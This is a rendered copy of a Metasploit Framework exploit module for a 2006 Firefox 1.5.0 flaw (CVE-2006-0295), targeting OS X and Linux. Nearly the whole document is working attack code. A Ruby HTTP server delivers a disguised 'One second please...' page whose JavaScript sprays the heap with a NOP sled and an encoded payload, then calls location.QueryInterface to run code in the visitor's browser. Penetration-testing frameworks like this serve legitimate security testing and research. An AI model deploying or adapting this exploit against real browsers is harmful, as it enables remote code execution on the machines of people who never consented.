Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/firefox_queryinterface.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Firefox location.QueryInterface() Code Execution',

19
        'Description' => %q{

20
          This module exploits a code execution vulnerability in the Mozilla

21
          Firefox browser. To reliably exploit this vulnerability, we need to fill

22
          almost a gigabyte of memory with our nop sled and payload. This module has

23
          been tested on OS X 10.3 with the stock Firefox 1.5.0 package.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => ['hdm'],

27
        'References' => [

28
          ['CVE', '2006-0295'],

29
          ['OSVDB', '22893'],

30
          ['BID', '16476'],

31
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],

32
        ],

33
        'Payload' => {

34
          'Space' => 1000 + (rand(256).to_i * 4),

35
          'BadChars' => "\x00",

36
        },

37
        'Platform' => %w{osx linux},

38
        'Targets' => [

39
          [

40
            'Firefox 1.5.0.0 Mac OS X',

41
            {

42
              'Platform' => 'osx',

43
              'Arch' => ARCH_PPC

44
            }

45
          ],

46


47
          [

48
            'Firefox 1.5.0.0 Linux',

49
            {

50
              'Platform' => 'linux',

51
              'Arch' => ARCH_X86,

52
            }

53
          ],

54
        ],

55
        'DisclosureDate' => '2006-02-02',

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63
  end

64


65
  def on_request_uri(cli, request)

66
    # Re-generate the payload

67
    return if ((p = regenerate_payload(cli)) == nil)

68


69
    print_status("Sending #{self.name}")

70
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

71
    handler(cli)

72
  end

73


74
  def generate_html(payload)

75
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

76
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

77


78
    return <<~EOF

79
      <html>

80
      <head>

81
      <title>One second please...</title>

82
      <script language="javascript">

83


84
      function BodyOnLoad() {

85
        h = FillHeap();

86
        location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));

87
      };

88


89
      function FillHeap() {

90
        // Filler

91
        var m = "";

92
        var h = "";

93
        var a = 0;

94


95
        // Nop sled

96
        for(a=0; a<(1024*256); a++)

97
          m += unescape("#{enc_nops}");

98


99
        // Payload

100
        m += unescape("#{enc_code}");

101


102
        // Repeat

103
        for(a=0; a<1024; a++)

104
          h += m;

105


106
        // Return

107
        return h;

108
      }

109
      </script>

110
      </head>

111
      <body onload="BodyOnLoad()">

112
      </body>

113
      </html>

114
    EOF

115
  end

116
end

117


118